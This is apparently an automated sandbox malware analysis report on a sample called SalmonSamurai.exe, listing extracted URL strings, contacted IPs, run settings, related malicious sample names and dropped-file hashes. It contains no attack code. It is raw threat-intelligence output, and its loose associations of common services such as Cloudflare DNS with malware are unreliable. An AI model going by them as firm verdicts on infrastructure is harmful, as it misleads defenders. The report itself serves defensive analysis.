                                                                                                                                  https://oceanhero.today/web?q=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://crbug.com/newCheckIfAudioThreadIsAliveMedia.AudioThreadStatusCreatingSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://ch.search.yahoo.com/favicon.icoSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/CloudflareSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://crbug.com/dawn/582SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://crbug.com/dawn/1083SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://crbug.com/dawn/343SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://crbug.com/dawn/342SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://imgs.sapo.pt/images/sapo.icohttp://pesquisa.sapo.pt/?q=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://nl.search.yahoo.com/searchSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://in.search.yahoo.com/favicon.icohttps://in.search.yahoo.com/searchSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://search.goo.ne.jp/cdn/common/img/favicon.icoSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://crbug.com/tint/1003SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://ak.apnstatic.com/media/images/favicon_search-results.icohttp://dts.search-results.com/sr?lng=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://www.sogou.com/images/logo/old/favicon.icoSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://in.search.yahoo.com/searchSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://search.imesh.net/favicon.icoSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://pe.search.yahoo.com/favicon.icohttps://pe.search.yahoo.com/searchSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://crbug.com/dawn/792SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://arianna.libero.it/search/abin/integrata.cgi?query=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://odvr.nic.cz/dohSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://crbug.com/dawn/673SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://imgs.sapo.pt/images/sapo.icoSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://search.privacywall.org/suggest.php?q=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://de.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://ar.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://www.quad9.net/home/privacy/SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://www.yandex.ua/chrome/newtabSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://id.search.yahoo.com/favicon.icoSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://search.daum.net/search?w=tot&DA=JU5&q=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://search.naver.com/search.naver?ie=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://search.daum.net/favicon.icohttps://search.daum.net/search?w=tot&DA=JU5&q=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://nigma.ru/themes/nigma/img/favicon.icohttp://nigma.ru/?s=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://doh.cleanbrowsing.org/doh/adult-filterSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                      		high

                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                      89.187.28.253
                                                                                                                                                                                                      		unknownUkraine
                                                                                                                                                                                                      		39810UA-WICOMWiMAXUkraineAutonomousSystemUAfalse
                                                                                                                                                                                                      172.64.41.3
                                                                                                                                                                                                      		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                      		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                      Private

                                                                                                                                                                                                      IP
                                                                                                                                                                                                      192.168.2.5

                                                                                                                                                                                                      General Information

                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                      Analysis ID:1579955
                                                                                                                                                                                                      Start date and time:2024-12-23 17:03:20 +01:00
                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                      Overall analysis duration:0h 10m 27s
                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                      Run name:Run with higher sleep bypass
                                                                                                                                                                                                      Number of analysed new started processes analysed:55
                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                      Sample name:SalmonSamurai.exe
                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                      Classification:mal45.winEXE@77/139@2/3
                                                                                                                                                                                                      EGA Information:Failed
                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 142.251.40.195, 172.202.163.200, 23.218.208.109, 13.107.246.63
                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                      • VT rate limit hit for: SalmonSamurai.exe

                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                      No simulations

                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                      IPs

                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      172.64.41.3nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                            Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                              Ocean-T2I4I8O9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                  pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                    file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                      RECOUVREMENT -FACTURER1184521.pdfGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        chrome.cloudflare-dns.comhttps://liladelman.com/rental/1218-west-side-road-block-island/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                        Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                        nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                        gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                        trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                        Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                        MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                        SWIFT.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 162.159.61.3

                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        CLOUDFLARENETUSMT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                        • 104.21.67.152
                                                                                                                                                                                                                        Payout Receipts.pptxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                        • 104.18.95.41
                                                                                                                                                                                                                        http://tax-com.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 172.67.203.198
                                                                                                                                                                                                                        https://www.cocol88.site/l6v3z.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 104.21.63.207
                                                                                                                                                                                                                        https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 172.67.69.226
                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 104.21.95.235
                                                                                                                                                                                                                        file.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                        • 104.21.40.196
                                                                                                                                                                                                                        https://mandrillapp.com/track/click/30903880/lamp.avocet.io?p=eyJzIjoiM2NCLS1TMlk4RWF3Nl9vVXV4SHlzRDZ5dmJJIiwidiI6MSwicCI6IntcInVcIjozMDkwMzg4MCxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2xhbXAuYXZvY2V0LmlvXFxcL25ldy11c2VyXCIsXCJpZFwiOlwiMTMxMTQyZmQwMzMxNDA4MWE0YmQyOGYzZDRmYmViYzRcIixcInVybF9pZHNcIjpbXCI0OWFlZTViODJkYzk4NGYxNTg2ZGIzZTYzNGE5ZWUxMDgxYjVmMDY5XCJdfSJ9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 104.18.16.155
                                                                                                                                                                                                                        https://laimilano.powerappsportals.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 104.21.22.164
                                                                                                                                                                                                                        UA-WICOMWiMAXUkraineAutonomousSystemUAhttps://prosayverso.com.ar/BM2kli2PnglFe5rx0qi2PNk17Fe5RSNAs3RKdy9frGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                        • 89.187.28.95
                                                                                                                                                                                                                        https://www.serserijeans.com/kdy9bFe5glari2Px0qak17sdy9nFe5k17Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 89.187.28.219
                                                                                                                                                                                                                        https://www.maultalk.com/url.php?to=https://www.serserijeans.com/gdy9haBM2BM2Fe5rss3RhBM2i2Pdk17x0qvi2PFe5nnaai2PrpWO3rk17dy9s3RWO3BM2Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 89.187.28.219
                                                                                                                                                                                                                        https://fahrerdokument.com/zip3/Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                        • 89.187.28.179
                                                                                                                                                                                                                        https://forum.fontlab.com/index.php?thememode=full;redirect=https://ags.college/D5Qw4GQ3Ea4RAy2APw4GloTxB4GalP21z01coTxmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                        • 89.187.28.92
                                                                                                                                                                                                                        EEad1s92K0.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                        • 89.187.3.90
                                                                                                                                                                                                                        C6ego4oO3t.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                        • 89.187.3.81

                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dllNativeApp_G5L1NHZZ.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                            CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                              AyqwnIUrcz.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                nanophanotool.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                  9VbeqQbgU4.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                                                                                    9VbeqQbgU4.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                                                                                      ivySCI-5.6.3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        ivySCI-5.6.3.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):3008
                                                                                                                                                                                                                                          Entropy (8bit):5.43001359394195
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:FizsSU4y4RQmFoUeCamfm9qr9t5/78NQffii+RlxJZaxIZVEouNHJBVrHLj/jCVb:FizlHyIFKL2O9qrh7KWKjJlPEo2drXk
                                                                                                                                                                                                                                          MD5:CB2EF1217DA37F608E2BAA5674B60219
                                                                                                                                                                                                                                          SHA1:03F4BF75AE213AA01644B1920B803A34DFAEB4C3
                                                                                                                                                                                                                                          SHA-256:C949313791CD314DD4AED678C5355B2428AD9D8E1E4771BAAA4784E538558DF8
                                                                                                                                                                                                                                          SHA-512:6A15A94FAB426FC725CFDD9717E5A496BD6E0FCEC09165A84B59B906886F89301AE82CDB990D7A0297222B4755853A572A501BDD13F19EB60E385A130BF8CEFA
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:@...e.................................Z.J.......................H..............@-....f.J.|.7h8..+.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00mglmgs.tzb.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
